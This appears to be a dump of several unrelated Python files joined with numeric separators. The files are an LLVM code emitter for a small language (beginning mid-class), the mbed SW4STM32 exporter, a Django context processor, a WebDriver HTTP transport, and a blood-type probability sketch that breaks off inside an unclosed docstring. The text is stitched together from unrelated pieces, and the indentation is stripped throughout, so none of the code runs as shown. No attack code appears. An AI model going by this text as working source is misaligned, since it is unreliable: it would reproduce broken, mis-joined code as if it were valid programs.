#Workhorse of the actual emitting process. Passed around as out so as to be theoretically reentrant.
#Tracks variables, globals, function prototypes, included files, contexts (indent etc), scopes
class _IndentContext:
#Helper so that one can write
#with out.context():
# #Do something
#Just pops the last context off the context map chain when it returns (if no error)
def __init__(self, emitter):
self.emitter=emitter
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
if traceback: return
del self.emitter.context_map.maps[0]
class _ScopeContext:
#Same as above, but for scope
def __init__(self, emitter):
self.emitter=emitter
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
if traceback: return
del self.emitter.scopes.maps[0]
def __init__(self, fd, options):
#Construct an emitter, outputting to the file fd
self.fd=fd
self.indent_context_manager=Emitter._IndentContext(self)
self.scope_context_manager=Emitter._ScopeContext(self)
#The context chainmap is a series of maps, where the current state
# (file, line, class, method, etc) is readable by indexing into the
# chain. This allows nested contexts, for example a method in a class
# in a included file in an included file in an included file, and for
# it all to be sorted out at the end of those scopes.
#Create a scope by doing
#with emitter.scope(line=foo, file=bar, method=baz):
# #Do stuff that will call emitter.emit*
# and then the emitted lines will have the correct context/debugging
# info attached
self.context_map=collections.ChainMap({
"indent":0,
"line":"u",
"file":"u",
"ns":"u",
"class":"u",
"method":"u",
"astblock":"u",
"path":"./"
})
self.temp_count=0 #Number of temporary (for SSA) variables we've allocated
self.last_line=-1 #Debug helper
self.last_file=-1 #Debug helper
self.last_method=-1 #Debug helper
self.options=options
#Same idea as the context maps. Provides a stack of orth_var_name:Variable
# mappings that (as a virtue of being a stack) respects local declarations over
# global names)
#Contains global variables in the last element in the chain (scopes.maps[-1])
self.scopes=collections.ChainMap({})
self.signatures={} #Map of name->Variable for functions
self.global_statments=[] #Stuff to stick at the end of the file (e.g. string literals)
self.included_files=[] #Files whose contents have actually been emitted
self.prepared_files=[] #Files whose prototypes/globals have been emitted, and signatures loaded
#(all files will have that preparation transformation applied before _any_ are actually
# "included")
self.defined_files=[]
self.ast_cache={} #Cache of filename (non-mangled)->ASTNode for files
self.path_cache={} #Cache of include_name->File path for imports
self.types=copy.copy(datamodel.builtin_types) #Dictionary of orth_type_name:OTypes of the types availible (globally)
#in the program
self.searchpath=["."] #Search path for imported modules (using import name, as opposed to import "relative_path")
self.startup_functions=[]
if not options.get("no0double", False):
self.emitl("@_the_zero_double = global double 0.0")
if "path" in options:
self.searchpath=options["path"]
def emit(self, text):
self.fd.write(text)
def emitindent(self):
self.emit("\t"*self.context_map['indent'])
def emitl(self, line):
self.emitindent()
self.emit(line)
self.emit("\t\t;from "+self.context_map['file']+":"+str(self.context_map['line']))
self.emit("\n")
def context(self, indent_by=1, **kwargs):
#Create and push a context on to the context map chain stack. Automatically indents +1 if not otherwise specified
if 'indent' not in kwargs:
kwargs['indent']=self.context_map['indent']+indent_by
self.context_map.maps.insert(0, kwargs)
self.last_line=self.context_map["line"]
self.last_file=self.context_map["file"]
self.last_method=self.context_map["method"]
return self.indent_context_manager #This function returns a context manager that automatically pops the context when the block ends
def indent(self, by=1):
return self.context(indent_by=by)
def get_name(self):
#Get a non-conficting SSA name
self.temp_count+=1
return "f{}_m{}_l{}_n{}".format(
self.context_map['file'],
self.context_map['method'],
self.context_map['line'],
self.temp_count
)
def get_temp_name(self):
#Get a non-conflicting SSA name for an intermidiate variable
return "temp_"+self.get_name()
def scope(self):
#Create a scope and push it onto the scope chain map stack
self.scopes.maps.insert(0, {})
return self.scope_context_manager
def set_var_name(self, vname, aname, type):
#Create a variable (in the topmost scope) and register it's type
self.scopes.maps[0][vname]=Variable(aname, type)
def set_signature(self, fname, type):
self.signatures[fname]=Variable("@"+fname, type)
def set_global_var_name(self, vname, aname, type):
#Create a global and register it's type
self.scopes.maps[-1][vname]=Variable(aname, type)
def get_var_name(self, vname):
#Get the llvm identifer for a variable (returns the identifier (which never
# shadow each other) of the variable in the topmost scope containing one named
# `vname`)
return self.scopes[vname].name
def get_var_type(self, vname):
#Same behavior as get_var_name, but returns the OType of the variable
return self.scopes[vname].type
def get_var(self, vname):
#Same behavior as get_var_name, but returns the whole Variable object
return self.scopes[vname]
def add_global_stmt(self, text):
#Stick a glbal statment for emitting at the end onto the list (e.g. string literals)
self.global_statments.append(text)
def emit_global_statments(self):
#Emit all the cached global statments
for stmt in self.global_statments:
self.emitl(stmt)
#Mapping of ASTNode type -> Transformer type
#Is a one-to-one mapping, but in some cases a transformer may match a more specific subclass of a ASTNode than another
# (in that case we always want the more specific match)
transformers={}
class TransformerMeta(type):
#Metaclass for transformers that registers it
def __new__(self, name, bases, classdict):
cls = type.__new__(self, name, bases, classdict)
if cls.transforms is not None:
if isinstance(cls.transforms, list):
for nodetype in cls.transforms:
transformers[nodetype]=cls
else:
transformers[cls.transforms]=cls
return cls
class Transformer(metaclass=TransformerMeta):
transforms=None #This is either a single ASTNode subclass or a list of them that this Transofmrer is capable of matching
def __init__(self, node, parent):
self.node=node
self.parent=parent
def transform(self, out):
#Returns a LLVM identifier string for the value of this ASTNode (assuming it has one) otherwise None
pass
def transform_address(self, out):
#Required for stuff that can be the LHS of an AssignmentExpr. Should return a LLVM identifier string
# for a local variable of type <get_type()>*, reffering to the memory address of the location it's value
# is stored at
pass
def prepare(self, out):
#Not required. For functiondecls and global decls, and file this will be called at import-resolution time
# (as opposed to include-time) and should be used to declare types and variables etc
pass
@staticmethod
def get_type(node, out):
#Returns a OType that is the type of the variable returned by transform()
pass
def get_transformer_cls(node):
match=None
for item in transformers.keys():
if isinstance(node, item) and (match is None or issubclass(item, match)):
match=item
if match is None:
raise IndexError("No transformer for %s of type %s"%(str(node), str(type(node))))
return transformers[match]
def get_transformer(node, parent):
return get_transformer_cls(node)(node, parent)
def emit(out, node, parent=None):
return get_transformer(node, parent).transform(out)
def emit_project(out, node, parent=None):
get_transformer(node, parent).define(out)
get_transformer(node, parent).prepare(out)
return get_transformer(node, parent).transform(out)
def get_type(node, out):
if isinstance(node, str):
return out.types[node]
if isinstance(node, datamodel.OType):
return node
res = get_transformer_cls(node).get_type(node, out)
if isinstance(res, datamodel.OType):
return res
return out.types[res]
def do_var_alloc(out, varname, type):
name="var_"+out.get_name()+"___"+varname
out.emitl("%{} = alloca {}".format(name, type.get_llvm_representation()))
out.set_var_name(varname, "%"+name, type)
return "%"+name
def call_func(name, argtypes, args, out):
arg_values=[]
for idx, arg in enumerate(args):
arg_values.append(argtypes[idx]+" "+arg)
return "call {} @{}({}) ;call_func".format(
out.signatures[name].type.get_llvm_representation(),
name,
",".join(arg_values)
)
def resolve_import(import_node, out):
if import_node.absolute:
return import_node.identifier.replace("$",os.path.dirname(out.context_map["path"]))
else:
if import_node.identifier in out.path_cache:
return out.path_cache[import_node.identifier]
for dir in out.searchpath:
if os.path.isdir(dir):
if import_node.identifier+".ort" in os.listdir(dir):
result=os.path.join(dir, import_node.identifier+".ort")
out.path_cache[import_node.identifier]=result
return result
elif import_node.identifier in os.listdir(dir):
result=os.path.join(os.path.join(dir, import_node.identifier), "__init__.ort")
out.path_cache[import_node.identifier]=result
return result
raise ImportError("No module `%s' found on search path"%import_node.identifier)
def sanitize_fn(fn):
return fn.strip().replace(".ort","").replace("/","").replace(".","").replace("\\","").replace(" ","")
def ret_local(fn):
#Wrap a transform or transform_addres function that returns the name of a local SSA ariable
# sans-% and adds one.
@functools.wraps(fn)
def _wrapped(*a, **k):
return "%"+fn(*a, **k)
return _wrapped | 0.039038 |
"""
mbed SDK
Copyright (c) 2011-2017 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import print_function, absolute_import
from builtins import str
from os.path import splitext, basename, relpath, join
import shutil
from tools.utils import mkdir
from tools.export.gnuarmeclipse import GNUARMEclipse
from tools.export.gnuarmeclipse import UID
from tools.build_api import prepare_toolchain
from tools.targets import TARGET_MAP
from sys import flags, platform
# Global random number generator instance.
u = UID()
class Sw4STM32(GNUARMEclipse):
"""
Sw4STM32 class
"""
NAME = 'Sw4STM32'
TOOLCHAIN = 'GCC_ARM'
BOARDS = {
'B96B_F446VE':
{
'name': 'B96B-F446VE',
'mcuId': 'STM32F446VETx'
},
'DISCO_F051R8':
{
'name': 'STM32F0DISCOVERY',
'mcuId': 'STM32F051R8Tx'
},
'DISCO_F303VC':
{
'name': 'STM32F3DISCOVERY',
'mcuId': 'STM32F303VCTx'
},
'DISCO_F334C8':
{
'name': 'STM32F3348DISCOVERY',
'mcuId': 'STM32F334C8Tx'
},
'DISCO_F401VC':
{
'name': 'STM32F401C-DISCO',
'mcuId': 'STM32F401VCTx'
},
'DISCO_F407VG':
{
'name': 'STM32F4DISCOVERY',
'mcuId': 'STM32F407VGTx'
},
'DISCO_F413ZH':
{
'name': 'DISCO_F413',
'mcuId': 'STM32F413ZHTx'
},
'DISCO_F429ZI':
{
'name': 'STM32F429I-DISCO',
'mcuId': 'STM32F429ZITx'
},
'DISCO_F469NI':
{
'name': 'DISCO-F469NI',
'mcuId': 'STM32F469NIHx'
},
'DISCO_F746NG':
{
'name': 'STM32F746G-DISCO',
'mcuId': 'STM32F746NGHx'
},
'DISCO_F769NI':
{
'name': 'DISCO-F769NI',
'mcuId': 'STM32F769NIHx'
},
'DISCO_L053C8':
{
'name': 'STM32L0538DISCOVERY',
'mcuId': 'STM32L053C8Tx'
},
'DISCO_L072CZ_LRWAN1':
{
'name': 'DISCO-L072CZ-LRWAN1',
'mcuId': 'STM32L072CZTx'
},
'MTB_MURATA_ABZ':
{
'name': 'MTB-MURATA-ABZ',
'mcuId': 'STM32L0x2xZ'
},
'DISCO_L475VG_IOT01A':
{
'name': 'STM32L475G-DISCO',
'mcuId': 'STM32L475VGTx'
},
'DISCO_L476VG':
{
'name': 'STM32L476G-DISCO',
'mcuId': 'STM32L476VGTx'
},
'NUCLEO_F030R8':
{
'name': 'NUCLEO-F030R8',
'mcuId': 'STM32F030R8Tx'
},
'NUCLEO_F031K6':
{
'name': 'NUCLEO-F031K6',
'mcuId': 'STM32F031K6Tx'
},
'NUCLEO_F042K6':
{
'name': 'NUCLEO-F042K6',
'mcuId': 'STM32F042K6Tx'
},
'NUCLEO_F070RB':
{
'name': 'NUCLEO-F070RB',
'mcuId': 'STM32F070RBTx'
},
'NUCLEO_F072RB':
{
'name': 'NUCLEO-F072RB',
'mcuId': 'STM32F072RBTx'
},
'NUCLEO_F091RC':
{
'name': 'NUCLEO-F091RC',
'mcuId': 'STM32F091RCTx'
},
'NUCLEO_F103RB':
{
'name': 'NUCLEO-F103RB',
'mcuId': 'STM32F103RBTx'
},
'NUCLEO_F207ZG':
{
'name': 'NUCLEO-F207ZG',
'mcuId': 'STM32F207ZGTx'
},
'NUCLEO_F302R8':
{
'name': 'NUCLEO-F302R8',
'mcuId': 'STM32F302R8Tx'
},
'NUCLEO_F303K8':
{
'name': 'NUCLEO-F303K8',
'mcuId': 'STM32F303K8Tx'
},
'NUCLEO_F303RE':
{
'name': 'NUCLEO-F303RE',
'mcuId': 'STM32F303RETx'
},
'NUCLEO_F303ZE':
{
'name': 'NUCLEO-F303ZE',
'mcuId': 'STM32F303ZETx'
},
'NUCLEO_F334R8':
{
'name': 'NUCLEO-F334R8',
'mcuId': 'STM32F334R8Tx'
},
'NUCLEO_F401RE':
{
'name': 'NUCLEO-F401RE',
'mcuId': 'STM32F401RETx'
},
'NUCLEO_F410RB':
{
'name': 'NUCLEO-F410RB',
'mcuId': 'STM32F410RBTx'
},
'NUCLEO_F411RE':
{
'name': 'NUCLEO-F411RE',
'mcuId': 'STM32F411RETx'
},
'NUCLEO_F413ZH':
{
'name': 'NUCLEO-F413ZH',
'mcuId': 'STM32F413ZHTx'
},
'NUCLEO_F429ZI':
{
'name': 'NUCLEO-F429ZI',
'mcuId': 'STM32F429ZITx'
},
'NUCLEO_F446RE':
{
'name': 'NUCLEO-F446RE',
'mcuId': 'STM32F446RETx'
},
'NUCLEO_F446ZE':
{
'name': 'NUCLEO-F446ZE',
'mcuId': 'STM32F446ZETx'
},
'NUCLEO_F746ZG':
{
'name': 'NUCLEO-F746ZG',
'mcuId': 'STM32F746ZGTx'
},
'NUCLEO_F767ZI':
{
'name': 'NUCLEO-F767ZI',
'mcuId': 'STM32F767ZITx'
},
'NUCLEO_L011K4':
{
'name': 'NUCLEO-L011K4',
'mcuId': 'STM32L011K4Tx'
},
'NUCLEO_L031K6':
{
'name': 'NUCLEO-L031K6',
'mcuId': 'STM32L031K6Tx'
},
'NUCLEO_L053R8':
{
'name': 'NUCLEO-L053R8',
'mcuId': 'STM32L053R8Tx'
},
'NUCLEO_L073RZ':
{
'name': 'NUCLEO-L073RZ',
'mcuId': 'STM32L073RZTx'
},
'MTB_RAK811':
{
'name': 'MTB-RAK-811',
'mcuId': 'STM32L151CBUxA'
},
'NUCLEO_L152RE':
{
'name': 'NUCLEO-L152RE',
'mcuId': 'STM32L152RETx'
},
'NUCLEO_L432KC':
{
'name': 'NUCLEO-L432KC',
'mcuId': 'STM32L432KCUx'
},
'MTB_ADV_WISE_1510':
{
'name': 'MTB-ADV-WISE-1510',
'mcuId': 'STM32L443xC'
},
'NUCLEO_L476RG':
{
'name': 'NUCLEO-L476RG',
'mcuId': 'STM32L476RGTx'
},
'NUCLEO_L486RG':
{
'name': 'NUCLEO-L486RG',
'mcuId': 'STM32L486RGTx'
},
'NUCLEO_L496ZG':
{
'name': 'NUCLEO-L496ZG',
'mcuId': 'STM32L496ZGTx'
},
'NUCLEO_L496ZG_P':
{
'name': 'NUCLEO-L496ZG',
'mcuId': 'STM32L496ZGTx'
},
'NUCLEO_L4R5ZI':
{
'name': 'NUCLEO-L4R5ZI',
'mcuId': 'STM32L4R5ZITx'
}
}
@classmethod
def is_target_supported(cls, target_name):
target = TARGET_MAP[target_name]
target_supported = bool(set(target.resolution_order_names)
.intersection(set(cls.BOARDS.keys())))
toolchain_supported = cls.TOOLCHAIN in target.supported_toolchains
return target_supported and toolchain_supported
def __gen_dir(self, dir_name):
"""
Method that creates directory
"""
settings = join(self.export_dir, dir_name)
mkdir(settings)
def get_fpu_hardware(self, fpu_unit):
"""
Convert fpu unit name into hardware name.
"""
hw = ''
fpus = {
'fpv4spd16': 'fpv4-sp-d16',
'fpv5d16': 'fpv5-d16',
'fpv5spd16': 'fpv5-sp-d16'
}
if fpu_unit in fpus:
hw = fpus[fpu_unit]
return hw
def process_sw_options(self, opts, flags_in):
"""
Process System Workbench specific options.
System Workbench for STM32 has some compile options, which are not recognized by the GNUARMEclipse exporter.
Those are handled in this method.
"""
opts['c']['preprocess'] = False
if '-E' in flags_in['c_flags']:
opts['c']['preprocess'] = True
opts['cpp']['preprocess'] = False
if '-E' in flags_in['cxx_flags']:
opts['cpp']['preprocess'] = True
opts['c']['slowflashdata'] = False
if '-mslow-flash-data' in flags_in['c_flags']:
opts['c']['slowflashdata'] = True
opts['cpp']['slowflashdata'] = False
if '-mslow-flash-data' in flags_in['cxx_flags']:
opts['cpp']['slowflashdata'] = True
if opts['common']['optimization.messagelength']:
opts['common']['optimization.other'] += ' -fmessage-length=0'
if opts['common']['optimization.signedchar']:
opts['common']['optimization.other'] += ' -fsigned-char'
if opts['common']['optimization.nocommon']:
opts['common']['optimization.other'] += ' -fno-common'
if opts['common']['optimization.noinlinefunctions']:
opts['common']['optimization.other'] += ' -fno-inline-functions'
if opts['common']['optimization.freestanding']:
opts['common']['optimization.other'] += ' -ffreestanding'
if opts['common']['optimization.nobuiltin']:
opts['common']['optimization.other'] += ' -fno-builtin'
if opts['common']['optimization.spconstant']:
opts['common']['optimization.other'] += ' -fsingle-precision-constant'
if opts['common']['optimization.nomoveloopinvariants']:
opts['common']['optimization.other'] += ' -fno-move-loop-invariants'
if opts['common']['warnings.unused']:
opts['common']['warnings.other'] += ' -Wunused'
if opts['common']['warnings.uninitialized']:
opts['common']['warnings.other'] += ' -Wuninitialized'
if opts['common']['warnings.missingdeclaration']:
opts['common']['warnings.other'] += ' -Wmissing-declarations'
if opts['common']['warnings.pointerarith']:
opts['common']['warnings.other'] += ' -Wpointer-arith'
if opts['common']['warnings.padded']:
opts['common']['warnings.other'] += ' -Wpadded'
if opts['common']['warnings.shadow']:
opts['common']['warnings.other'] += ' -Wshadow'
if opts['common']['warnings.logicalop']:
opts['common']['warnings.other'] += ' -Wlogical-op'
if opts['common']['warnings.agreggatereturn']:
opts['common']['warnings.other'] += ' -Waggregate-return'
if opts['common']['warnings.floatequal']:
opts['common']['warnings.other'] += ' -Wfloat-equal'
opts['ld']['strip'] = False
if '-s' in flags_in['ld_flags']:
opts['ld']['strip'] = True
opts['ld']['shared'] = False
if '-shared' in flags_in['ld_flags']:
opts['ld']['shared'] = True
opts['ld']['soname'] = ''
opts['ld']['implname'] = ''
opts['ld']['defname'] = ''
for item in flags_in['ld_flags']:
if item.startswith('-Wl,-soname='):
opts['ld']['soname'] = item[len('-Wl,-soname='):]
if item.startswith('-Wl,--out-implib='):
opts['ld']['implname'] = item[len('-Wl,--out-implib='):]
if item.startswith('-Wl,--output-def='):
opts['ld']['defname'] = item[len('-Wl,--output-def='):]
opts['common']['arm.target.fpu.hardware'] = self.get_fpu_hardware(
opts['common']['arm.target.fpu.unit'])
opts['common']['debugging.codecov'] = False
if '-fprofile-arcs' in flags_in['common_flags'] and '-ftest-coverage' in flags_in['common_flags']:
opts['common']['debugging.codecov'] = True
# Passing linker options to linker with '-Wl,'-prefix.
for index in range(len(opts['ld']['flags'])):
item = opts['ld']['flags'][index]
if not item.startswith('-Wl,'):
opts['ld']['flags'][index] = '-Wl,' + item
# Strange System Workbench feature: If first parameter in Other flags is a
# define (-D...), Other flags will be replaced by defines and other flags
# are completely ignored. Moving -D parameters to defines.
for compiler in ['c', 'cpp', 'as']:
tmpList = opts[compiler]['other'].split(' ')
otherList = []
for item in tmpList:
if item.startswith('-D'):
opts[compiler]['defines'].append(str(item[2:]))
else:
otherList.append(item)
opts[compiler]['other'] = ' '.join(otherList)
# Assembler options
for as_def in opts['as']['defines']:
if '=' in as_def:
opts['as']['other'] += ' --defsym ' + as_def
else:
opts['as']['other'] += ' --defsym ' + as_def + '=1'
def generate(self):
"""
Generate the .project and .cproject files.
"""
options = {}
if not self.resources.linker_script:
raise NotSupportedException("No linker script found.")
print('\nCreate a System Workbench for STM32 managed project')
print('Project name: {0}'.format(self.project_name))
print('Target: {0}'.format(self.toolchain.target.name))
print('Toolchain: {0}'.format(self.TOOLCHAIN) + '\n')
self.resources.win_to_unix()
libraries = []
for lib in self.libraries:
library, _ = splitext(basename(lib))
libraries.append(library[3:])
self.system_libraries = [
'stdc++', 'supc++', 'm', 'c', 'gcc', 'nosys'
]
profiles = self.get_all_profiles()
self.as_defines = [s.replace('"', '"')
for s in self.toolchain.get_symbols(True)]
self.c_defines = [s.replace('"', '"')
for s in self.toolchain.get_symbols()]
self.cpp_defines = self.c_defines
self.include_path = []
for s in self.resources.inc_dirs:
self.include_path.append("../" + self.filter_dot(s))
print('Include folders: {0}'.format(len(self.include_path)))
self.compute_exclusions()
print('Exclude folders: {0}'.format(len(self.excluded_folders)))
ld_script = self.filter_dot(self.resources.linker_script)
print('Linker script: {0}'.format(ld_script))
lib_dirs = [self.filter_dot(s) for s in self.resources.lib_dirs]
preproc_cmd = basename(self.toolchain.preproc[0]) + " " + " ".join(self.toolchain.preproc[1:])
for id in ['debug', 'release']:
opts = {}
opts['common'] = {}
opts['as'] = {}
opts['c'] = {}
opts['cpp'] = {}
opts['ld'] = {}
opts['id'] = id
opts['name'] = opts['id'].capitalize()
profile = profiles[id]
# A small hack, do not bother with src_path again,
# pass an empty string to avoid crashing.
src_paths = ['']
toolchain = prepare_toolchain(
src_paths, "", self.toolchain.target.name, self.TOOLCHAIN, build_profile=[profile])
# Hack to fill in build_dir
toolchain.build_dir = self.toolchain.build_dir
flags = self.toolchain_flags(toolchain)
# Most GNU ARM Eclipse options have a parent,
# either debug or release.
if '-O0' in flags['common_flags'] or '-Og' in flags['common_flags']:
opts['parent_id'] = 'debug'
else:
opts['parent_id'] = 'release'
self.process_options(opts, flags)
opts['c']['defines'] = self.c_defines
opts['cpp']['defines'] = self.cpp_defines
opts['as']['defines'] = self.as_defines
self.process_sw_options(opts, flags)
opts['ld']['library_paths'] = [
self.filter_dot(s) for s in self.resources.lib_dirs]
opts['ld']['user_libraries'] = libraries
opts['ld']['system_libraries'] = self.system_libraries
opts['ld']['script'] = "linker-script-" + id + ".ld"
# Unique IDs used in multiple places.
uid = {}
uid['config'] = u.id
uid['tool_c_compiler'] = u.id
uid['tool_c_compiler_input'] = u.id
uid['tool_cpp_compiler'] = u.id
uid['tool_cpp_compiler_input'] = u.id
opts['uid'] = uid
options[id] = opts
ctx = {
'name': self.project_name,
'platform': platform,
'include_paths': self.include_path,
'config_header': self.config_header_ref.name,
'exclude_paths': '|'.join(self.excluded_folders),
'ld_script': ld_script,
'library_paths': lib_dirs,
'object_files': self.resources.objects,
'libraries': libraries,
'board_name': self.BOARDS[self.target.upper()]['name'],
'mcu_name': self.BOARDS[self.target.upper()]['mcuId'],
'cpp_cmd': preproc_cmd,
'options': options,
# id property of 'u' will generate new random identifier every time
# when called.
'u': u
}
self.__gen_dir('.settings')
self.gen_file('sw4stm32/language_settings_commom.tmpl',
ctx, '.settings/language.settings.xml')
self.gen_file('sw4stm32/project_common.tmpl', ctx, '.project')
self.gen_file('sw4stm32/cproject_common.tmpl', ctx, '.cproject')
self.gen_file('sw4stm32/makefile.targets.tmpl', ctx,
'makefile.targets', trim_blocks=True, lstrip_blocks=True)
self.gen_file('sw4stm32/launch.tmpl', ctx, self.project_name +
' ' + options['debug']['name'] + '.launch')
@staticmethod
def clean(_):
shutil.rmtree(".settings")
| 0.000487 |
# -*- coding: utf-8 -*-
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
import copy
from django.conf import settings
from django.contrib.staticfiles import finders
from django.utils.timezone import now
from django.utils.translation import ugettext as _
from treemap.util import get_last_visited_instance
from treemap.models import InstanceUser
REPLACEABLE_TERMS = {
'Resource': {'singular': _('Resource'),
'plural': _('Resources')}
}
def global_settings(request):
last_instance = get_last_visited_instance(request)
if hasattr(request, 'user') and request.user.is_authenticated():
last_effective_instance_user =\
request.user.get_effective_instance_user(last_instance)
_update_last_seen(last_effective_instance_user)
else:
if hasattr(request, 'instance'):
instance = request.instance
default_role = instance.default_role
last_effective_instance_user = InstanceUser(
role=default_role, instance=instance)
else:
last_effective_instance_user = None
if hasattr(request, 'instance') and request.instance.logo:
logo_url = request.instance.logo.url
else:
logo_url = settings.STATIC_URL + "img/logo.png"
try:
comment_file_path = finders.find('version.txt')
with open(comment_file_path, 'r') as f:
header_comment = f.read()
except:
header_comment = "Version information not available\n"
term = copy.copy(REPLACEABLE_TERMS)
if hasattr(request, 'instance'):
term.update(request.instance.config.get('terms', {}))
ctx = {
'SITE_ROOT': settings.SITE_ROOT,
'settings': settings,
'last_instance': last_instance,
'last_effective_instance_user': last_effective_instance_user,
'logo_url': logo_url,
'header_comment': header_comment,
'term': term,
}
return ctx
def _update_last_seen(last_effective_instance_user):
# Update the instance user's "last seen" date if necessary.
# Done here instead of in middleware to avoid looking up
# the request's InstanceUser again.
iu = last_effective_instance_user
today = now().date()
if iu and iu.id and (not iu.last_seen or iu.last_seen < today):
iu.last_seen = today
iu.save_base()
| 0.000415 |
import json
import select
from six import text_type, PY3
from six.moves.http_client import HTTPConnection
from six.moves.urllib import parse as urlparse
from . import error
"""Implements HTTP transport for the WebDriver wire protocol."""
class Response(object):
"""
Describes an HTTP response received from a remote end whose
body has been read and parsed as appropriate.
"""
def __init__(self, status, body, headers):
self.status = status
self.body = body
self.headers = headers
def __repr__(self):
cls_name = self.__class__.__name__
if self.error:
return "<%s status=%s error=%s>" % (cls_name, self.status, repr(self.error))
return "<% status=%s body=%s>" % (cls_name, self.status, json.dumps(self.body))
def __str__(self):
return json.dumps(self.body, indent=2)
@property
def error(self):
if self.status != 200:
return error.from_response(self)
return None
@classmethod
def from_http(cls, http_response, decoder=json.JSONDecoder, **kwargs):
try:
body = json.load(http_response, cls=decoder, **kwargs)
headers = dict(http_response.getheaders())
except ValueError:
raise ValueError("Failed to decode response body as JSON:\n" +
http_response.read())
return cls(http_response.status, body, headers)
class HTTPWireProtocol(object):
"""
Transports messages (commands and responses) over the WebDriver
wire protocol.
Complex objects, such as ``webdriver.Element``, ``webdriver.Frame``,
and ``webdriver.Window`` are by default not marshaled to enable
use of `session.transport.send` in WPT tests::
session = webdriver.Session("127.0.0.1", 4444)
response = transport.send("GET", "element/active", None)
print response.body["value"]
# => {u'element-6066-11e4-a52e-4f735466cecf': u'<uuid>'}
Automatic marshaling is provided by ``webdriver.protocol.Encoder``
and ``webdriver.protocol.Decoder``, which can be passed in to
``HTTPWireProtocol.send`` along with a reference to the current
``webdriver.Session``::
session = webdriver.Session("127.0.0.1", 4444)
response = transport.send("GET", "element/active", None,
encoder=protocol.Encoder, decoder=protocol.Decoder,
session=session)
print response.body["value"]
# => webdriver.Element
"""
def __init__(self, host, port, url_prefix="/"):
"""
Construct interface for communicating with the remote server.
:param url: URL of remote WebDriver server.
:param wait: Duration to wait for remote to appear.
"""
self.host = host
self.port = port
self.url_prefix = url_prefix
self._conn = None
self._last_request_is_blocked = False
def __del__(self):
self.close()
def close(self):
"""Closes the current HTTP connection, if there is one."""
if self._conn:
self._conn.close()
@property
def connection(self):
"""Gets the current HTTP connection, or lazily creates one."""
if not self._conn:
conn_kwargs = {}
if not PY3:
conn_kwargs["strict"] = True
# We are not setting an HTTP timeout other than the default when the
# connection its created. The send method has a timeout value if needed.
self._conn = HTTPConnection(self.host, self.port, **conn_kwargs)
return self._conn
def url(self, suffix):
"""
From the relative path to a command end-point,
craft a full URL suitable to be used in a request to the HTTPD.
"""
return urlparse.urljoin(self.url_prefix, suffix)
def send(self,
method,
uri,
body=None,
headers=None,
encoder=json.JSONEncoder,
decoder=json.JSONDecoder,
timeout=None,
**codec_kwargs):
"""
Send a command to the remote.
The request `body` must be JSON serialisable unless a
custom `encoder` has been provided. This means complex
objects such as ``webdriver.Element``, ``webdriver.Frame``,
and `webdriver.Window`` are not automatically made
into JSON. This behaviour is, however, provided by
``webdriver.protocol.Encoder``, should you want it.
Similarly, the response body is returned au natural
as plain JSON unless a `decoder` that converts web
element references to ``webdriver.Element`` is provided.
Use ``webdriver.protocol.Decoder`` to achieve this behaviour.
The client will attempt to use persistent HTTP connections.
:param method: `GET`, `POST`, or `DELETE`.
:param uri: Relative endpoint of the requests URL path.
:param body: Body of the request. Defaults to an empty
dictionary if ``method`` is `POST`.
:param headers: Additional dictionary of headers to include
in the request.
:param encoder: JSON encoder class, which defaults to
``json.JSONEncoder`` unless specified.
:param decoder: JSON decoder class, which defaults to
``json.JSONDecoder`` unless specified.
:param codec_kwargs: Surplus arguments passed on to `encoder`
and `decoder` on construction.
:return: Instance of ``webdriver.transport.Response``
describing the HTTP response received from the remote end.
:raises ValueError: If `body` or the response body are not
JSON serialisable.
"""
if body is None and method == "POST":
body = {}
payload = None
if body is not None:
try:
payload = json.dumps(body, cls=encoder, **codec_kwargs)
except ValueError:
raise ValueError("Failed to encode request body as JSON:\n"
"%s" % json.dumps(body, indent=2))
# When the timeout triggers, the TestRunnerManager thread will reuse
# this connection to check if the WebDriver its alive and we may end
# raising an httplib.CannotSendRequest exception if the WebDriver is
# not responding and this httplib.request() call is blocked on the
# runner thread. We use the boolean below to check for that and restart
# the connection in that case.
self._last_request_is_blocked = True
response = self._request(method, uri, payload, headers, timeout=None)
self._last_request_is_blocked = False
return Response.from_http(response, decoder=decoder, **codec_kwargs)
def _request(self, method, uri, payload, headers=None, timeout=None):
if isinstance(payload, text_type):
payload = payload.encode("utf-8")
if headers is None:
headers = {}
headers.update({"Connection": "keep-alive"})
url = self.url(uri)
if self._last_request_is_blocked or self._has_unread_data():
self.close()
self.connection.request(method, url, payload, headers)
# timeout for request has to be set just before calling httplib.getresponse()
# and the previous value restored just after that, even on exception raised
try:
if timeout:
previous_timeout = self._conn.gettimeout()
self._conn.settimeout(timeout)
response = self.connection.getresponse()
finally:
if timeout:
self._conn.settimeout(previous_timeout)
return response
def _has_unread_data(self):
return self._conn and self._conn.sock and select.select([self._conn.sock], [], [], 0)[0]
| 0.001144 |
#!/usr/bin/env python
"""
Phenotype: 0, A, B, AB
Genotype: 00, 0A, A0, AA, 0B, B0, BB, AB
P(P):
0 .37
A .38
B .17
AB .08
P(P|G)
0 | 00 1
A | 0A 1
A | A0 1
A | AA 1
B | 0B 1
B | B0 1
B | BB 1
AB | AB 1
otherwise 0
"""
from prob import P
from enum import Enum
class Phenotype(Enum):
O = 0
A = 1
B = 2
AB = 3
def genPhenotypeSet(name):
return Enum("Phenotype_"+name,"0 A B AB", module=__name__)
def genPhenotypeGivenGenotypeProb(name,genotype):
pset = genPhenotypeSet(name)
return "p_NAME(TOP_Parent)_Phenotype_Genotype"
def genGenotypeGivenParentsGenotype(name,mother,father):
return "p_"
class Genotype(Enum):
OO = 1
OA = 2
AO = 3
AA = 4
OB = 5
BO = 6
BB = 7
AB = 8
BA = 9
def genGenotypeSet(name):
return Enum("Genotype_"+name, "OO OA AO AA OB BO BB AB BA", module=__name__)
"""
# wikipedia - eu
p_Phenotype = P(Phenotype)
p_Phenotype.table([ [Phenotype.O, 0.37],
[Phenotype.A, 0.38],
[Phenotype.B, 0.17],
[Phenotype.AB,0.08]])
